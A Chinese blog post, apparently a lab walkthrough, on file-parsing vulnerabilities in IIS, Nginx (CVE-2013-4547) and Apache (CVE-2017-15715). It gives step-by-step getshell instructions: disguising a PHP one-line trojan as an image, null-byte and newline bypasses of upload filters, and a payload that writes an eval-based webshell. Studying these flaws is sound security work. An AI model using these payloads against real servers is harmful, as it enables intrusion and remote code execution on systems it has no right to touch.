首页 > 其他分享 >中间件解析漏洞

中间件解析漏洞

时间:2024-09-05 19:24:32浏览次数:5  
标签:asp 后缀 步骤 中间件 jpg 漏洞 解析 上传 php

⼀:IIS解析漏洞

1.1:IIS6.X

在iis6.x中,.asp⽂件夹中的任意⽂件都会被当做asp⽂件去执⾏。

1.在iis的⽹站根⽬录新建⼀个名为x.asp的⽂件 ,在x.asp中新建⼀个jpg⽂件。内容为<%=now()%> asp代码

2.在外部浏览器中访问windows2003的iis⽹站中的2.jpg 发现asp代码被执行

3.将2.jpg⽂件放到⽹站根⽬录下访问,发现其中的asp代码没有被解析。 由此可⻅.asp⽂件夹中的任意⽂件会被当做asp⽂件去执⾏.

⽅式⼆:畸形⽂件解析

在IIS 6 处理⽂件解析时,分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是shell.asp。另外IIS6.0默认的可执⾏⽂件除了asp还包含 asa\cer\cdx

1.2:IIS7.X

在IIS7.0和IIS7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在⼀个⽂件路径/xx.jpg后⾯加上/xx.php会将 /xx.jpg/xx.php 解析为 php ⽂件。

》》》利⽤条件《《《

1. php.ini⾥的cgi.fix_pathinfo=1 开启 2. IIS7在Fast-CGI运⾏模式下

步骤一:配置 php.ini ⽂件,将 cgi.fix_pathinfo=1 取消掉...并重启

 

步骤二:IIS --》 配置⽹站--》 处理程序映射--》 PHPStudy_FastCGI --》 请求限制 --》取消勾选

 

 

》》》利⽤姿势《《《 

》》》GetShell《《《

步骤⼀:将PHP⼀句话⽊⻢写到shell.php并更改后缀为shell.jpg上传到⽬标站点...利⽤解析漏洞进⾏访问

 

步骤⼆:添加Shell并链接 

 


⼆:Nginx解析漏洞

2.1:nginx_parsing

》》》利⽤姿势《《《

步骤一:浏览器中访问⽹站 

步骤二:制作图⽚⻢并进⾏上传...获取上传⽂件地址 

 

 

 步骤三:访问以下路径,利⽤Nginx解析漏洞.

 http://172.16.1.97/uploadfiles/f3ccdd27d2000e3f9255a7e3e2c48800.jpg/.php

 


2.2:CVE-2013-4547

》》》利⽤姿势《《《

步骤一:通过浏览器访问靶场⻚⾯,直接上传 shell.php 被拦截...修改⽂件后缀为.jpg进⾏上传且在后⾯添加空格;上传成功 

步骤二:在.jpg后⾯添加两个空格并给上 .php 后缀,在16进制修改中将原本两个空格的 0x200x20 修改为如下即 0x20 0x00 进⾏发包... 

 

 

步骤三:访问上传后的⽂件....由于url会将其编码,需要继续抓包修改 0x20 0x20 为 0x20 0x00

 

 

由于木马地址编码问题,⼯具连不到 ,可以看到我们访问到了图片头,说明上传成功

 

三:Apache解析漏洞

3.1:apache_parsing

Apache HTTPD ⽀持⼀个⽂件拥有多个后缀,并为不同后缀执⾏不同的指令。⽐如如下配置⽂件:

1.AddType text / html . html 2.AddLanguage zh - CN . cn
其给 .html 后缀增加了 media-type ,值为 text/html ;给.cn 后缀增加了语⾔,值为 zh-CN 。此时,如果⽤户请求⽂件 index.cn.html ,他将返回⼀个中⽂的html⻚⾯。以上就是Apache多后缀的特性。如果运维⼈员给 .php 后缀增加了处理器:
AddHandler application / x - httpd - php . php
那么,在有多个后缀的情况下,只要⼀个⽂件含有 .php 后缀的⽂件即将被识别成PHP⽂件,没必要是最后⼀个后缀。利⽤这个特性,将会造成⼀个可以绕过上传⽩名单的解析漏洞。

》》》利⽤姿势《《《 

步骤一:访问靶机并上传 shell.php.jpg ⽂件,⽂件内容为

<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"]);?>')?>

 

步骤二:上传成功后与⽹站进⾏路径拼接...如下

172.16.1.97/uploadfiles/1.php.jpg 

 

步骤三:访问⽣成的shell.php并执⾏命令,执⾏成功 

 

3.2:CVE-2017-15715 

》》》利⽤姿势《《《

步骤一:访问网站尝试上传⼀句话⽊⻢⽂件,发现被拦截...

 

步骤二:在evil.php⽂件后⾯添加空格 0x20 在改为 0x0a 再次返送即可上传成功 

 

 

步骤三:访问上传的evil⽂件在后⾯加上 %0a 再访问发现解析了其中的PHP代码,但后缀不是php说明存在解析漏洞 

步骤四:链接成功!  

 

 

 

 

标签:asp,后缀,步骤,中间件,jpg,漏洞,解析,上传,php
From: https://blog.csdn.net/kknifek/article/details/141937349

相关文章

  • 中间件解析漏洞
    1、IIS1.iis6.x(1)在iis的网站根目录新建一个x.asp文件(2)在x.asp中新建⼀个jpg⽂件。内容为asp代码。(3)在外部浏览器中访问windows2003的iis⽹站中的2.jpg发现asp代码被执⾏(4)将2.jpg⽂件放到⽹站根⽬录下访问,发现其中的asp代码没有被解析。由此可⻅.asp⽂件夹中的任意......
  • 深度解析C++中函数重载与引用
    ......
  • Android开发 - Matrix 处理图像变换解析
    Matrix是什么Matrix是一个用于处理图像变换的类,它可以对图像进行缩放、旋转、平移和倾斜等操作。通俗来讲,Matrix就像是一个数学公式,用来定义如何改变图像的位置、形状或者方向Matrix的主要功能缩放(Scale):可以改变图片的大小,比如放大或缩小旋转(Rotate):可以将图片绕某个......
  • 万字解析qinguoyi / TinyWebServer项目的源码
    前言项目地址项目详细介绍本文章适合刚学习完C++基础知识并尝试实现一个网络编程项目的同学,其中包含了该项目的代码逐行注释和解析以及许多刚学习网络编程中会遇到的疑问。项目简介:Linux下C++轻量级Web服务器,助力初学者快速实践网络编程,搭建属于自己的服务器.使用线......
  • MySQL索引与事务(详细解析)
    目录1.索引作用 优势:2.索引的使用 2.1查看索引 2.2创建索引2.3删除索引 3.索引的数据结构4.事务 4.1事务的概念 4.2事务的使用 1.索引作用 优势: --索引类似一本书的目录,加快提高的查询的效率 --索引会额外的占用磁盘的空间,可能会拖慢插入......
  • 《国家崛起》MSXML故障全解析:从诊断到修复的实战指南
    一、引言《国家崛起》作为一款经典的实时策略游戏,其稳定运行依赖于多个系统组件的支持,其中MSXML(MicrosoftXMLCoreServices)是不可或缺的一部分。MSXML用于处理游戏中的XML数据交换,如果出现故障,可能会导致游戏无法正常运行、报错或启动失败。本指南将全面解析《国家崛起》中M......
  • 解析和操作HTML文档,并进行同级或跨级匹配元素
      一、插件描述HtmlAgilityPack是一个C#的开源库,它提供了解析和操作HTML文档的功能。它是一个非常流行的工具,可以在C#环境中轻松地处理HTML内容。使用HtmlAgilityPack,你可以加载HTML文档,并使用XPath表达式来选择和操作文档中的元素。你可以通过HtmlNode对......
  • 基于 Python 的地址解析:自动识别姓名、电话、地址、详细地址与省市区
    随着电子商务和物流行业的蓬勃发展,自动化处理客户提供的收货信息变得尤为重要。在用户下单时,通常需要输入姓名、电话、地址等信息,但由于输入格式不统一,手动处理这些数据十分繁琐且容易出错。因此,利用Python自动解析用户输入的地址信息,提取姓名、电话、详细地址和省市区成为了许多......
  • django 自定义中间件
    概述中间件是Django请求/响应处理的框架,用于全局改变Django的请求输入或响应输出。在请求阶段,在调用视图之前,Django按照定义settings.MIDDLEWARE的顺序应用中间件MIDDLEWARE,自顶向下。中间件的结构:classSimpleMiddleware:def__init__(self,get_response):......
  • 【工具推荐】TomcatWeakPassChecker v2.2(最新版本) - Tomcat 漏洞一键漏洞利用getshe
    工具介绍:一键tomcat漏洞批量弱口令检测、后台部署war包getshell,该脚本用于检查ApacheTomcat管理页面的弱密码,并尝试通过上传自定义WAR包部署GodzillaWebshell。如果成功,将记录成功登录的信息以及获取到的Webshell地址。下载地址链接:https://pan.quark.cn/s/2062b75c4312环......